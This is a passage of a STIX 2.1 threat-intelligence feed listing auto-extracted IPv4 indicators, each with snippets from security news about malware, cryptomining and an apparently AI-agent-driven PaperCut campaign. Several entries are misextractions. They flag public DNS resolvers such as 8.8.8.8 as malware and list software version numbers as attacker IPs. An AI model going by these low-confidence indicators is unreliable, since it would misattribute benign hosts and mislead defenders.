News","url":"https://cybersecuritynews.com/one-click-on-a-malicious-link/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--eb45ff3b-2c54-4d6b-9924-7d4188b971d8","created":"2026-09-14T09:27:43.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.8.8.8","description":"Seen in \"Sandworm-Linked Cyclops Blink Returns With Network Scanning and Packet-Sniffing Capabilities\" (GBHackers). Context: entire framework. The module also uses Google Public DNS at 8.8.8.8 over DNS-over-HTTPS access to resolve transfer-host names,","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-09-14T09:27:43.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/cyclops-blink-variant/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3b235f83-1590-433e-b56c-aadabfe60785","created":"2026-09-10T18:49:43.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.142.193.132","description":"Seen in \"Hundreds of AI agents helped PaperCut attacker hit 395+ orgs, and some went off script\" (The Register · Security). Context: irm GreyNoise, which traced the campaign’s orchestration to 45.142.193.132 on August 31. “The adversary went from an empty workspace t","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-10T18:49:43.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Register · Security","url":"https://www.theregister.com/security/2026/09/10/hundreds-of-ai-agents-helped-papercut-attacker-hit-395-orgs-and-some-went-off-script/5295650"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bc77b94a-cd5d-494a-b4a3-26948f9c6ea7","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.0.0.1","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: ct() calls on TCP port 853 . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additiona","pattern":"[ipv4-addr:value = '1.0.0.1']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--901aee47-c1c7-4322-9567-2c864244cd3b","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 109.91.184.21","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: resolver infrastructure. Two addresses, 80.152.203.134 and 109.91.184.21 , did not clearly correspond to known public resolver servi","pattern":"[ipv4-addr:value = '109.91.184.21']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63eeb275-5e4d-426a-a9e3-617e74550721","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.1.1.1","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: nal connect() calls on TCP port 853 . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several","pattern":"[ipv4-addr:value = '1.1.1.1']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3703f720-e12c-4f6c-97cc-b55a41e1e273","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 80.152.203.134","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: ons were public DNS resolver infrastructure. Two addresses, 80.152.203.134 and 109.91.184.21 , did not clearly correspond to known pub","pattern":"[ipv4-addr:value = '80.152.203.134']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--753e9906-19fc-4915-852b-69130ff26a94","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.8.4.4","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: port 853 . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additional addresses. TCP/8","pattern":"[ipv4-addr:value = '8.8.4.4']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--434605a0-ff89-4a88-8c7e-71b892a6cc3f","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 8.8.8.8","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: erified while attempts to reach an external address such as 8.8.8.8 returned Network is unreachable. This design allowed the ma","pattern":"[ipv4-addr:value = '8.8.8.8']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--21dad2e1-ad6a-4cc2-8c5e-080d6835089c","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 9.9.9.10","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: tions included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additional addresses. TCP/853 is commonly asso","pattern":"[ipv4-addr:value = '9.9.9.10']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--59370d2a-23fe-4ebc-acb4-4e42748ae80f","created":"2026-09-10T12:58:10.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 9.9.9.9","description":"Seen in \"Redtail Payload Analysis &#x5b;Guest Diary&#x5d;, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: . Destinations included 1.1.1.1, 1.0.0.1, 8.8.8.8, 8.8.4.4, 9.9.9.9, 9.9.9.10, and several additional addresses. TCP/853 is com","pattern":"[ipv4-addr:value = '9.9.9.9']","pattern_type":"stix","valid_from":"2026-09-10T12:58:10.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33326"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9336b487-3cb3-4e1d-b683-5d070186aad4","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.142.193.132","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: he actors utilized infrastructure, including the IP address 45.142.193.132, which GreyNoise had tracked since early July for attacks a","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--96aca19b-335f-4ca6-919f-dd3e7fb064ff","created":"2026-09-10T05:20:30.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.158.196.75","description":"Seen in \"Hackers Deploy Hundreds of AI Agents to Compromise 440 PaperCut Servers\" (GBHackers). Context: paign orchestration and execution infrastructure IP address 45.158.196.75 Infrastructure used to execute campaign activity File hash","pattern":"[ipv4-addr:value = '45.158.196.75']","pattern_type":"stix","valid_from":"2026-09-10T05:20:30.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-deploy-hundreds-of-ai-agents/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9a5aba4-b11f-4aa3-962e-4dfc69474768","created":"2026-09-09T20:04:27.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 9.20.4.14","description":"Seen in \"Cisco security advisory (AV26-197) – Update 3\" (Canadian Centre for Cyber Security). Context: ewall Adaptive Security Appliance (ASA) – versions prior to 9.20.4.14 Cisco Secure Firewall Threat Defense (FTD) – all versions U","pattern":"[ipv4-addr:value = '9.20.4.14']","pattern_type":"stix","valid_from":"2026-09-09T20:04:27.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"Canadian Centre for Cyber Security","url":"https://cyber.gc.ca/en/alerts-advisories/cisco-security-advisory-av26-197"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0aa5bd64-27c8-4417-9f05-3b657b9fb56b","created":"2026-09-09T17:46:24.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 62.60.130.193","description":"Seen in \"Scans for Proxmox Servers, (Wed, Sep 9th)\" (SANS Internet Storm Center). Context: ll log failed login attempts with a 401 status code: ::ffff:62.60.130.193 - - [09/09/2026:15:26:14 +0000] \"POST /api2/json/access/tic","pattern":"[ipv4-addr:value = '62.60.130.193']","pattern_type":"stix","valid_from":"2026-09-09T17:46:24.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"SANS Internet Storm Center","url":"https://isc.sans.edu/diary/rss/33324"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b8f2db08-b4ef-4fcd-b3f0-9e3a425df1e2","created":"2026-09-09T14:40:47.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.142.193.132","description":"Seen in \"Hackers Use Hundreds of AI Agents to Exploit PaperCut Flaws and Compromise 440 Servers Worldwide\" (Cyber Security News). Context: nfrastructure. The malicious actor operated from IP address 45.142.193.132, which GreyNoise had flagged since early July 2026 for prob","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-09T14:40:47.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/papercut-flaws-compromised-using-ai/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d922004-9001-44eb-aa11-67942aa3778f","created":"2026-09-09T08:57:51.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 146.103.99.177","description":"Seen in \"Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT\" (GBHackers). Context: Incident responders should search for outbound sessions to 146.103.99.177 and 46.151.29.58, inspect the /tmp/ directory for .i.js fil","pattern":"[ipv4-addr:value = '146.103.99.177']","pattern_type":"stix","valid_from":"2026-09-09T08:57:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-critical-fortigate-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ae9f7223-e877-4997-a659-364d44d0a320","created":"2026-09-09T08:57:51.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 46.151.29.58","description":"Seen in \"Hackers Exploit Critical FortiGate Flaw to Deploy AI-Assisted PivotC2 RAT\" (GBHackers). Context: s should search for outbound sessions to 146.103.99.177 and 46.151.29.58, inspect the /tmp/ directory for .i.js files, and review ru","pattern":"[ipv4-addr:value = '46.151.29.58']","pattern_type":"stix","valid_from":"2026-09-09T08:57:51.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"GBHackers","url":"https://gbhackers.com/hackers-exploit-critical-fortigate-flaw/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6612d316-4ccd-44ac-81ce-c3853a89a604","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 173.212.244.25","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional observed development and QA targets IP address 2","pattern":"[ipv4-addr:value = '173.212.244.25']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--95948cd6-4a02-4cd4-b89d-6a0ffe42375e","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 188.245.99.156","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: f compromise (IoCs):- Type Indicator Description IP address 188.245.99.156 Operator host used for rogue Redis replication, command-and","pattern":"[ipv4-addr:value = '188.245.99.156']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e441398-23bc-41d1-bd57-8339662d688a","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 194.48.248.105","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: Recurring WordPress exploitation target IP address and port 194.48.248.105:8081 Earlier open directory linked by cryptocurrency wallet","pattern":"[ipv4-addr:value = '194.48.248.105']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fe0357e3-ec5e-48eb-a2b5-8332cbdf35ce","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.198.10.42","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: target, ownership unconfirmed IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional observed develo","pattern":"[ipv4-addr:value = '20.198.10.42']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bb660ef3-5fd4-420d-9931-c9c10e113630","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 213.6.207.123","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: hip unconfirmed IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional observed development and QA tar","pattern":"[ipv4-addr:value = '213.6.207.123']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--068bae63-f869-438f-8803-fe1f1950e564","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 23.235.223.49","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: 5 Additional observed development and QA targets IP address 23.235.223.49 Recurring WordPress exploitation target IP address and port","pattern":"[ipv4-addr:value = '23.235.223.49']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--214ab155-722b-4b0e-901f-e5463d03b101","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 34.166.99.116","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: eused QA or test target, ownership unconfirmed IP addresses 34.166.99.116 , 20.198.10.42 , 213.6.207.123 , 173.212.244.25 Additional","pattern":"[ipv4-addr:value = '34.166.99.116']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f07de110-0460-4b27-85d0-c47c66b30a3c","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.155.102.89","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: stname> Victim check-in request pattern IP address and port 45.155.102.89:10128 Local mining pool proxy used on the operator host Dom","pattern":"[ipv4-addr:value = '45.155.102.89']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5369f768-8bbd-40a1-a932-dd460af51827","created":"2026-09-09T07:47:48.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 47.250.92.230","description":"Seen in \"Hackers Turn More Than 3,500 Redis Servers Into Cryptocurrency Miners\" (Cyber Security News). Context: -controlled hostname resolving to 188.245.99.156 IP address 47.250.92.230 Frequently reused QA or test target, ownership unconfirmed","pattern":"[ipv4-addr:value = '47.250.92.230']","pattern_type":"stix","valid_from":"2026-09-09T07:47:48.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-turn-redis-servers/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--618e1543-72c7-448f-afb6-9d9a28d46de0","created":"2026-09-09T07:36:49.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 15.1.10.8","description":"Seen in \"F5 BIG-IP APM Malware Injects a PHP Web Shell Into Memory, Evading Disk Scans\" (The Hacker News). Context: 0 - 17.1.2 17.1.3 16.1.0 - 16.1.6 16.1.6.1 15.1.0 - 15.1.10 15.1.10.8 The patch that fixes this is nearly a year old. Ireland's N","pattern":"[ipv4-addr:value = '15.1.10.8']","pattern_type":"stix","valid_from":"2026-09-09T07:36:49.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/f5-big-ip-apm-malware-injects-php-web.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8a4a799d-0424-419b-8de8-94b972ec5a36","created":"2026-09-09T07:36:49.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 16.1.6.1","description":"Seen in \"F5 BIG-IP APM Malware Injects a PHP Web Shell Into Memory, Evading Disk Scans\" (The Hacker News). Context: .0 - 17.5.1 17.5.1.3 17.1.0 - 17.1.2 17.1.3 16.1.0 - 16.1.6 16.1.6.1 15.1.0 - 15.1.10 15.1.10.8 The patch that fixes this is nea","pattern":"[ipv4-addr:value = '16.1.6.1']","pattern_type":"stix","valid_from":"2026-09-09T07:36:49.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/f5-big-ip-apm-malware-injects-php-web.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--dfc965f8-b873-4d37-ae4e-ed08e8243485","created":"2026-09-09T07:36:49.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 17.5.1.3","description":"Seen in \"F5 BIG-IP APM Malware Injects a PHP Web Shell Into Memory, Evading Disk Scans\" (The Hacker News). Context: s. Versions known to be vulnerable Fixed in 17.5.0 - 17.5.1 17.5.1.3 17.1.0 - 17.1.2 17.1.3 16.1.0 - 16.1.6 16.1.6.1 15.1.0 - 15","pattern":"[ipv4-addr:value = '17.5.1.3']","pattern_type":"stix","valid_from":"2026-09-09T07:36:49.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/09/f5-big-ip-apm-malware-injects-php-web.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--99f83b18-39cd-4ecc-8b72-37717b7365c5","created":"2026-09-09T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.142.193.132","description":"Seen in \"Agents Gone Wild: An AI-Orchestrated Global Campaign Against PaperCut NG/MF\" (GreyNoise). Context: investigation. GreyNoise has been tracking malicious use of 45.142.193.132 since early July 2026 due to its use for attacks against in","pattern":"[ipv4-addr:value = '45.142.193.132']","pattern_type":"stix","valid_from":"2026-09-09T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GreyNoise","url":"https://www.greynoise.io/blog/ai-orchestrated-campaign-against-papercut-ng-mf"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--911cb675-1f99-432b-920e-c63945a82e51","created":"2026-09-09T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.158.196.75","description":"Seen in \"Agents Gone Wild: An AI-Orchestrated Global Campaign Against PaperCut NG/MF\" (GreyNoise). Context: 45.142.193.132 Used to orchestrate and execute the campaign 45.158.196.75 Used to execute the campaign 528cd4e69ecfa5191adbcf6ef28667","pattern":"[ipv4-addr:value = '45.158.196.75']","pattern_type":"stix","valid_from":"2026-09-09T00:00:00.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"GreyNoise","url":"https://www.greynoise.io/blog/ai-orchestrated-campaign-against-papercut-ng-mf"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d878709a-4f1f-4536-915d-facb0835508e","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.12.5.3","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: end of software maintenance); all versions 20.12.5 up until 20.12.5.3; all versions 20.12.6 up until 20.12.6.1; all versions 20.1","pattern":"[ipv4-addr:value = '20.12.5.3']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a9b9bda3-777b-47ea-a510-cfd0c9120c00","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.12.6.1","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: s 20.12.5 up until 20.12.5.3; all versions 20.12.6 up until 20.12.6.1; all versions 20.13 (end of software maintenance); all vers","pattern":"[ipv4-addr:value = '20.12.6.1']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0aed3841-f847-477a-b5c3-3f4e2bc11612","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.15.4.2","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: (end of software maintenance); all versions 20.15 up until 20.15.4.2; all versions 20.16 (end of software maintenance); all vers","pattern":"[ipv4-addr:value = '20.15.4.2']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--32ece604-5bd3-45b5-b289-60033a7a7f80","created":"2026-09-08T15:13:35.389Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.9.8.2","description":"Seen in \"2026-002: Multiple Vulnerabilities in Cisco Products\" (CERT-EU Advisories). Context: 9 (end of software maintenance); all versions 20.9 up until 20.9.8.2; all versions 20.11 (end of software maintenance); all vers","pattern":"[ipv4-addr:value = '20.9.8.2']","pattern_type":"stix","valid_from":"2026-09-08T15:13:35.389Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"CERT-EU Advisories","url":"https://cert.europa.eu/publications/security-advisories/2026-002/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d8b0bab1-853d-4d6e-8f10-46172efc8c14","created":"2026-09-08T12:10:57.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 146.103.127.44","description":"Seen in \"Hackers Disable Endpoint Protection and Deploy Sliver Across Compromised Windows Domain\" (Cyber Security News). Context: rd-tier fallback address, designated hunt-only IPv4 address 146.103.127.44 Historical operator-used address from April 2026, designate","pattern":"[ipv4-addr:value = '146.103.127.44']","pattern_type":"stix","valid_from":"2026-09-08T12:10:57.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-disable-endpoint-protection/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--81492d22-da06-4d46-baf7-21d0d94fd8d5","created":"2026-09-08T12:10:57.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 193.233.202.17","description":"Seen in \"Hackers Disable Endpoint Protection and Deploy Sliver Across Compromised Windows Domain\" (Cyber Security News). Context: compromise (IoCs):- Type Indicator Description IPv4 address 193.233.202.17 Primary Sliver command-and-control and staging-server 